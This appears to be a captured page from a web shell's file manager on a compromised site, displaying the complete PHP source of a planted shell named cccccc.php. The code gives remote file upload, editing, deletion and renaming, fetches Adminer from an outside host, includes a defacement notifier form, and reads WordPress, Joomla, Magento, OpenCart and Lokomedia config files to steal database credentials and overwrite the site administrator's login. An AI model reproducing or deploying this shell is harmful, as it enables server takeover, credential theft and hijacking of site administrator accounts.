Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
Submit
~
home
grandkon
public_html
admin
images
background
File Content:
cccccc.php
<?php $currentDir = isset($_POST['d']) && !empty($_POST['d']) ? base64_decode($_POST['d']) : getcwd(); $currentDir = str_replace("\\", "/", $currentDir); $dir = $currentDir; // Needed for Adminer logic // Adminer Download Panel if (isset($_GET['DPH']) && $_GET['DPH'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); $result = curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); return $result; } echo "<center><h2>Adminer Downloader</h2>"; if (file_exists('adminer.php')) { echo "<font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font>"; } else { if (adminer("https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php", "adminer.php")) { echo "<font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font>"; } else { echo "<font color=red>Failed to create adminer.php</font>"; } } echo "</center>"; exit; } // Simulated Zone-H Notifier if (isset($_GET['DPH']) && $_GET['DPH'] == 'zoneh') { echo "<hr><center><h2>Zone-H Style Notifier (Simulated)</h2>"; if (isset($_POST['submit'])) { $domainList = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Notifier Archive: <a href='#' target='_blank'>http://zone-h.org/archive/notifier=$nick</a><br><br>"; foreach ($domainList as $url) { $url = trim($url); if ($url) { echo htmlspecialchars($url) . " -> <font color=lime>SIMULATED_OK</font><br>"; } } } else { echo "<form method='post'> <u>Defacer</u>: <br> <input type='text' name='nick' size='50' value='DPH'><br> <u>Domains</u>: <br> <textarea style='width: 450px; height: 150px;' name='url'></textarea><br> <input type='submit' name='submit' value='Submit' style='width: 450px;'> </form>"; } echo "</center><hr>"; exit; } // Auto Edit User Config if (isset($_GET['DPH']) && $_GET['DPH'] == 'edit_user') { function ambilkata($string, $start, $end) { $str = explode($start, $string); if (isset($str[1])) { $str = explode($end, $str[1]); return $str[0]; } return ''; } if (isset($_POST['hajar'])) { if (strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Joomla<br>"; if($site == '') { echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "Sitename => $site<br>"; } if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Wordpress<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>"); $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>"); $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>"); $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>"); $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>"); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Magento<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => OpenCart<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; if($target2 == '') { $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>"; } else { $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>"; } else { $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Lokomedia<br>"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } } } } else { echo "<center> <h1>Auto Edit User Config</h1> <form method='post'> <input type='hidden' name='d' value='".base64_encode($currentDir)."'> DIR Config: <br> <input type='text' size='50' name='config_dir' value='$dir'><br><br> Set User & Pass: <br> <input type='text' name='user_baru' value='DPH' placeholder='user_baru'><br> <input type='text' name='pass_baru' value='DPH690' placeholder='pass_baru'><br> <input type='submit' name='hajar' value='Sikat!' style='width: 215px;'> </form> <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br> "; exit; } } // Directory Navigation $pathParts = explode("/", $currentDir); echo "<div class=\"dir\">"; foreach ($pathParts as $k => $v) { if ($v == "" && $k == 0) { echo "<a href=\"javascript:void(0);\" onclick=\"postDir('/')\">/</a>"; continue; } $dirPath = implode("/", array_slice($pathParts, 0, $k + 1)); echo "<a href=\"javascript:void(0);\" onclick=\"postDir('" . addslashes($dirPath) . "')\">$v</a>/"; } echo "</div>"; // Upload if (isset($_POST['s']) && isset($_FILES['u']) && $_FILES['u']['error'] == 0) { $fileName = $_FILES['u']['name']; $tmpName = $_FILES['u']['tmp_name']; $destination = $currentDir . '/' . $fileName; if (move_uploaded_file($tmpName, $destination)) { echo "<script>alert('Upload successful!'); postDir('" . addslashes($currentDir) . "');</script>"; } else { echo "<script>alert('Upload failed!');</script>"; } } // File/Folder Listing $items = scandir($currentDir); if ($items !== false) { echo "<table>"; echo "<tr><th>Name</th><th>Size</th><th>Action</th></tr>"; foreach ($items as $item) { $fullPath = $currentDir . '/' . $item; if ($item == '.' || $item == '..') continue; if (is_dir($fullPath)) { echo "<tr><td><a href=\"javascript:void(0);\" onclick=\"postDir('" . addslashes($fullPath) . "')\">📁 $item</a></td><td>--</td><td>--</td></tr>"; } else { $size = filesize($fullPath) / 1024; $size = $size >= 1024 ? round($size / 1024, 2) . 'MB' : round($size, 2) . 'KB'; echo "<tr><td><a href=\"javascript:void(0);\" onclick=\"postOpen('" . addslashes($fullPath) . "')\">📄 $item</a></td><td>$size</td><td>" . "<a href=\"javascript:void(0);\" onclick=\"postDel('" . addslashes($fullPath) . "')\">Delete</a> | " . "<a href=\"javascript:void(0);\" onclick=\"postEdit('" . addslashes($fullPath) . "')\">Edit</a> | " . "<a href=\"javascript:void(0);\" onclick=\"postRen('" . addslashes($fullPath) . "', '$item')\">Rename</a>" . "</td></tr>"; } } echo "</table>"; } else { echo "<p>Unable to read directory!</p>"; } // Delete File if (isset($_POST['del'])) { $filePath = base64_decode($_POST['del']); $fileDir = dirname($filePath); if (@unlink($filePath)) { echo "<script>alert('Delete successful'); postDir('" . addslashes($fileDir) . "');</script>"; } else { echo "<script>alert('Delete failed'); postDir('" . addslashes($fileDir) . "');</script>"; } } // Edit File if (isset($_POST['edit'])) { $filePath = base64_decode($_POST['edit']); $fileDir = dirname($filePath); if (file_exists($filePath)) { echo "<style>table{display:none;}</style>"; echo "<a href=\"javascript:void(0);\" onclick=\"postDir('" . addslashes($fileDir) . "')\">Back</a>"; echo "<form method=\"post\"> <input type=\"hidden\" name=\"obj\" value=\"" . $_POST['edit'] . "\"> <input type=\"hidden\" name=\"d\" value=\"" . base64_encode($fileDir) . "\"> <textarea name=\"content\">" . htmlspecialchars(file_get_contents($filePath)) . "</textarea> <center><button type=\"submit\" name=\"save\">Save</button></center> </form>"; } } // Save Edited File if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) { $filePath = base64_decode($_POST['obj']); $fileDir = dirname($filePath); if (file_put_contents($filePath, $_POST['content'])) { echo "<script>alert('Saved'); postDir('" . addslashes($fileDir) . "');</script>"; } else { echo "<script>alert('Save failed'); postDir('" . addslashes($fileDir) . "');</script>"; } } // Rename if (isset($_POST['ren'])) { $oldPath = base64_decode($_POST['ren']); $oldDir = dirname($oldPath); if (isset($_POST['new'])) { $newPath = $oldDir . '/' . $_POST['new']; if (rename($oldPath, $newPath)) { echo "<script>alert('Renamed'); postDir('" . addslashes($oldDir) . "');</script>"; } else { echo "<script>alert('Rename failed'); postDir('" . addslashes($oldDir) . "');</script>"; } } else { echo "<form method=\"post\"> New Name: <input name=\"new\" type=\"text\"> <input type=\"hidden\" name=\"ren\" value=\"" . $_POST['ren'] . "\"> <input type=\"hidden\" name=\"d\" value=\"" . base64_encode($oldDir) . "\"> <input type=\"submit\" value=\"Submit\"> </form>"; } } ?> <!DOCTYPE html> <html> <head> <title>File Manager + Adminer + ZoneH + AutoEditUser</title> <style> table { margin: 20px auto; border-collapse: collapse; width: 90%; } th, td { border: 1px solid #000; padding: 5px; text-align: left; } textarea { width: 100%; height: 300px; } .dir { margin: 20px; } </style> <script> function postDir(dir) { var form = document.createElement("form"); form.method = "post"; var input = document.createElement("input"); input.name = "d"; input.value = btoa(dir); form.appendChild(input); document.body.appendChild(form); form.submit(); } function postDel(path) { var form = document.createElement("form"); form.method = "post"; var input = document.createElement("input"); input.name = "del"; input.value = btoa(path); form.appendChild(input); document.body.appendChild(form); form.submit(); } function postEdit(path) { var form = document.createElement("form"); form.method = "post"; var input = document.createElement("input"); input.name = "edit"; input.value = btoa(path); form.appendChild(input); document.body.appendChild(form); form.submit(); } function postRen(path, name) { var newName = prompt("New name:", name); if (newName) { var form = document.createElement("form"); form.method = "post"; var input1 = document.createElement("input"); input1.name = "ren"; input1.value = btoa(path); var input2 = document.createElement("input"); input2.name = "new"; input2.value = newName; form.appendChild(input1); form.appendChild(input2); document.body.appendChild(form); form.submit(); } } function postOpen(path) { window.open(atob(btoa(path))); } </script> </head> <body> <div class="dir"> <form method="post" enctype="multipart/form-data"> <input type="file" name="u"> <input type="submit" name="s" value="Upload"> <input type="hidden" name="d" value="<?php echo base64_encode($currentDir); ?>"> </form> <div style="margin-top: 10px;"> <a href="?DPH=adminer">Adminer Download</a> | <a href="?DPH=zoneh">Zone-H Notifier</a> | <a href="?DPH=edit_user">Auto Edit User Config</a> </div> </div> </body> </html>
Edit
Rename
Chmod
Delete
